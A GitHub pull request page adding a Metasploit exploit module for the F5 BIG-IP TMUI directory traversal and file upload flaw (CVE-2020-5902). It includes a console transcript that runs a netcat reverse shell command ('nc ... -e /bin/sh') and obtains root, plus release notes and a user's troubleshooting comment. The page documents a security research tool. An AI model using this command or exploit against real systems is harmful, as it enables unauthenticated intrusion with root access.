Skip to content

Comments

Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902)#13807

Merged
smcintyre-r7 merged 10 commits intorapid7:masterfrom
wvu:feature/f5
Jul 7, 2020
Merged

Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902)#13807
smcintyre-r7 merged 10 commits intorapid7:masterfrom
wvu:feature/f5

Conversation

@wvu
Copy link
Contributor

@wvu wvu commented Jul 5, 2020
edited
Loading

Merged: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

If you're coming here from the Internet, please use the version in master (linked above), not the original commit. Thank you! See also: #13854 and #14003.

This module should get you a Unix root shell on an affected F5 BIG-IP if all goes well. This is NOT TMSH. It just goes through it. You may need to run the exploit a couple times until I fix the bugs.

msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[+] nc 172.16.163.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.163.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux

@wvu wvu added blocked Blocked by one or more additional tasks feature needs-docs external modules PRs dealing with modules run as their own process labels Jul 5, 2020
@label-actions
Copy link

label-actions bot commented Jul 5, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@wvu wvu marked this pull request as draft July 5, 2020 20:30
@dwisiswant0 dwisiswant0 mentioned this pull request Jul 6, 2020
Merged
@wvu wvu removed the needs-docs label Jul 6, 2020
@wvu wvu marked this pull request as ready for review July 7, 2020 17:07
@wvu wvu changed the title [WIP] Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) Jul 7, 2020
@wvu wvu removed the blocked Blocked by one or more additional tasks label Jul 7, 2020
@wvu wvu added module and removed external modules PRs dealing with modules run as their own process labels Jul 7, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Jul 7, 2020
@smcintyre-r7 smcintyre-r7 merged commit 16ff439 into rapid7:master Jul 7, 2020
@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Jul 7, 2020
edited by tperry-r7
Loading

Release Notes

The F5 BIG-IP TMUI Directory Traversal and File Upload RCE module exploits a directory traversal vulnerability within the F5 BIG-IP appliance, identified as CVE-2020-5902. The vulnerability is unauthenticated and can be leveraged to obtain remote code execution.

@wvu wvu deleted the feature/f5 branch July 7, 2020 17:46
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 9, 2020
@wvu wvu mentioned this pull request Jul 17, 2020
Merged
@wvu wvu added the docs label Jul 17, 2020
@wvu wvu mentioned this pull request Aug 15, 2020
Merged
@hackercoolmagz
Copy link

hackercoolmagz commented Sep 18, 2020

I am getting struck at
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[] Creating alias list=bash

while running the exploit. Any solution please. I have used the exact payload and set the target to 0 (Unix).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@smcintyre-r7 smcintyre-r7

Labels

docs feature module rn-modules release notes for new or majorly enhanced modules

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@wvu @smcintyre-r7 @hackercoolmagz @tperry-r7